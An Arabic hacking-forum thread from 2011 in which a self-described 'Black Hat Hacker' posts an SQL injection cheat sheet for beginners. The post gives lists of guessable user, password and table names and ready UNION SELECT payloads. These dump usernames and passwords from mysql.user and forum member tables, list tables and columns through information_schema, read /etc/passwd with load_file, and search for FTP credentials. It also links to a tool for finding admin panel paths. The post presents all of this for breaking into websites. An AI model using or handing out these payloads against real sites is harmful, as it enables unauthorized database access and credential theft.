نحن مع غزة
الـرئـيـسـيـة الـمـنـتـدى سـؤال & اجـابـة الـتـبـرع بـالـدم الاسـتـضـافـة هـلال لـيـنـكـس الـقـرآن الـكـريـم Dz-SeC team


التسجيل في المنتدى غير متاح حاليا, اذا كنت ترغب في الحصول على عضوية ارجو مراسلتي على البريد الالكتروني "[email protected]"


مطلوب مشرفين على كامل اقسام المنتدى


أخي / أختي , إن تسجيل عضوية جديدة في منتدى شبكة الجزائر للجميع لا يهدف إلى زيادة الأعضاء مطلقا
فلا خير في عضوية عدد مشاركاتها صفرا فنحن نرفض يوميا الكثير من العضويات المشكوك في أمرها
سواء كان هدفها الإعلانات الغير شرعية أو تخريب الموضوعات الخ , كل هذا حتى يبقى المنتدى
ساحة جادة عطرة تجود بالخير لكل زوارها وأعضائها
وصدقة جارية لكل من يشارك في كتابة معلومة تفيد غيره سوف يشكر الله عليها وهو في جوف الأرض ...

لذلك نطلب منك التسجيل بل ونلح عليك إن كان هدفك هو أن تصنع صدقة جارية لا تنقطع إلى يوم الدين بمساعدة إخوانك في نشر الخير .

للتسجيل اضغط هنا وأملأ البينات المطلوبة بشكل صحيح ومن ثم انتظر حتى نقوم بتفعيل حسابك وابدأ رحلتك في صناعة صدقة جارية .

وتذكر قول سيد الخلق " إذا مات ابن آدم انقطع عمله إلا من ثلاث صدقة جارية أو علم ينتفع به أو ولدٍ صالح يدعو له "

   

[ منتدى حـقن قواعد البيانات | Sql injcetion ] قسم يهتم باهم ثـغرات الحقن .. حقن قواعد البيانات واهم الطرق المستعملة في ذلـك ,

إضافة رد
 
أدوات الموضوع انواع عرض الموضوع
قديم 20/07/2011, 17:49   المشاركة رقم: 1
المعلومات
الكاتب:
 S4wDz  
اللقب:
[{ عضو مميز }]
الصورة الرمزية
 
الصورة الرمزية S4wDz

البيانات
التسجيل : Jul 2011
العضوية : 2184
الاهتمامات : PeneteratioN Testing
الإقامة : coMputer any one
المواضيع : 181
الردود : 419
المجموع : 600
بمعدل : 0.11 يوميا
الاختراقات : []
مجتمعنا : [/]
الصنف : Black Hat Hacker
آخر تواجد : 27/10/2017/19:45
سبب الغياب : حاضر
معدل التقييم: 15
نقاط التقييم: 21
S4wDz is on a distinguished road
شكراً: 128
تم شكره 120 مرة في 72 مشاركة

 Algeria


الإتصالات
الحالة:
S4wDz غير متواجد حالياً
وسائل الإتصال:

افتراضي حقن قواعد البيانات بثغرت SQL injection

بسـم اللــه الرحمــن الرحيــم

السلام عليكم اخواني الغاليين

مجموعه الكلمات المتحتمله التي تستخدم في حقن قواعد البيانات بثغرت SQL jnjection

وان شاء الله تفيدكم في الحقن وتكون مرجع للمبتدئين حتى يحفظون الاستغلال نبدأ على بركة الله

اسماء اليوزرات المحتمله في قواعد البيانات وقت الحقن



الرمز:
user & users & username & admin & adminlogim & login & member & membername

user_name



الان اسماء الباسوردات المحتمله في قواعد البيانات وقت الحقن



الرمز:password & pass & passwd & pwd


اسماء قواعد البيانات المحتمله في اي موقع وانت وتخمينك في الحقن هذي الكلمات المتداوله بكثره بين الناس



الرمز:
user
users
mysql.user
mysql.db
mysql.dbh
smf_members


ناخذ امثله على الكلمات السابقه للتوضيح وقت الحقن

الان مثلا اسم القاعده في الموقع هذي ( mysql.user ) لو نبغي نستخرج يوزر الموقع بيكون الاستغلال بهذا الشكل



الرمز:union+select+1,2,user,4,5+from+mysql.user


ونفس الاستغلال السابق لليوزر لو نبغي نستخرج باسورد اليوزر اللي خرج لنا بيكون الاستغلال بهذا الشكل



الرمز:union+select+1,2,password,4,5+from+mysql.user


مثال اخر على الكلمات السابقه للتوضيع



الرمز:union+select+1,2,membername,4,5+from+smf_members


لاستخراج الجداول في قواعد البيانات وقت الحقن



الرمز:union+select+1,2,table_name,4,5+from+information_s chema.tables


لاستخراج الاعمده في قواحد البيانات وقت الحقن



الرمز:union+select+1,2,column_name,4,5+from+information_ schema.columns


الان مثلاً اردنا استخراج العضويه رقم ( 1 ) يكون الاستغلال بهذا الشكل

طبعاً مع تغير كلمة user الى اي كلمه تخمنها من الكلمات المستخدمه لليوزرات المذكوره سابقاً



الرمز:union+select+1,2,username,4,5+from+users+where+use rid=1/*


الان امر مهم في الحقن لقرائة ملفات السيرفر لو كان السيرفر يسمح لك بالقرائه



الرمز:load_file("/هنا الاوامر")


مثال على هذا



الرمز:union+select+1,load_file("/"),3,4+from+mysql.user


وتكون الاوامر داخل القوسين مثال يوضح امر قراءة حسابات السيرفر



الرمز:union+select+1,load_file("/etc/passwd"),3,4+from+mysql.user


او نجرب هذا نفس الامر بس نتراجع للخلف



الرمز:union+select+1,load_file("/../../etc/passwd"),3,4+from+mysql.user


الكلمات المحتمله للحصول على بيانات الـ FTP وقت الحقن

هذا الامر خاص بالبحث في الجداول


الرمز:union+select+1,2,table_name,4,5+from+information_s chema.tables+where+table_name+like+'%25ftp%25'/*



هذا الامر خاص بالبحث في الاعمده



الرمز:union+select+1,2,column_name,4,5+from+information_ schema.columns+where+column_name+like+'%25ftp%25'/*


FTP ملاحظه مهمه في الامرين السابقين في البحث عن بيانات الـ



الرمز:'%25ftp%25' <<< في هذا الامر


تقدر تكتب اللي تبيه كتخمين منك انت مثلا ftp تستطيع ان تخمن اللي تبيه مثلا بدال كامة



الرمز:'%25user%25' & '%25logim%25'


يعني حاول تخمن اكبر عدد من الكلمات المحتمله وحط في بالك ان كل سيرفر يختلف عن الثاني

ممكن في سيرفر تطلع معاك بيانات كثيره وسيرفر غيره مايطلع معاك شي عادي


موقع يبحث عن مسارات لوحه التحكم لاي سكربت

اكتب عنوان الموقع وبعدها علامه السلاش


تفضلو الموقع

http://www.code-balkan.com/adminpagefind.php/



آخر مواضيع » S4wDz


التعديل الأخير تم بواسطة S4wDz ; 25/07/2011 الساعة 02:40
عرض البوم صور S4wDz   رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)


حالياً الأعضاء النشيطين الذين يشاهدون هذا الموضوع : 1 (0 عضو و 1 ضيف)
 

(أظهر الكل الأعضاء الذين قاموا بمشاهدة هذا الموضوع : 17
9lbi hacker , adelbm , Dz-Hat , ثائر الهوارين , Hackerz , kevin death , ma20030 , mbsoft , microsarme6943 , moja4ed_fz , MR.KaDeRoU , MrAchraf , سردينة2009 , S-japonia33 , S1LV3rS3rf3r , S4wDz , sami hack

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

كود [IMG] متاحة
كود HTML معطلة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
تلغيم قواعد البيانات بشل ^_^ MdMn HaCk3r [ مـنتدى حمايه المواقع والسيرفرات | Hacking Site's & Servers ] 2 30/01/2011 08:30
{8}---{2}حقن قواعد البيانات اصدار 5 الوصول لعمود الباسورد{2}---{8} ViRuS_Ra3cH دورة اختراق المواقع والسيرفورات | kala$nikov 0 18/03/2010 14:13
{7}---{1}حقن قواعد البيانات اصدار 5الدعسه الاولى{1}---{7} ViRuS_Ra3cH دورة اختراق المواقع والسيرفورات | kala$nikov 0 18/03/2010 14:11
--{1} شرح اساسيات***65279; قواعد البيانات{1}-- ViRuS_Ra3cH دورة اختراق المواقع والسيرفورات | kala$nikov 1 18/03/2010 12:50
--{2} استعلامات قواعد البيانات {2}-- ViRuS_Ra3cH دورة اختراق المواقع والسيرفورات | kala$nikov 0 18/03/2010 12:49

الساعة معتمدة بتوقيت جرينتش +1 . الساعة الآن : 08:18.
Copy Right Des 2010 - 2014 To is|sec Organization, Des By  yasMouh 
Powered By vBulletin Special Edition, Secured By Dz-SeC team
Support by Dz-SeC team




RSS RSS 2.0 XML MAP HTML



 
 
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115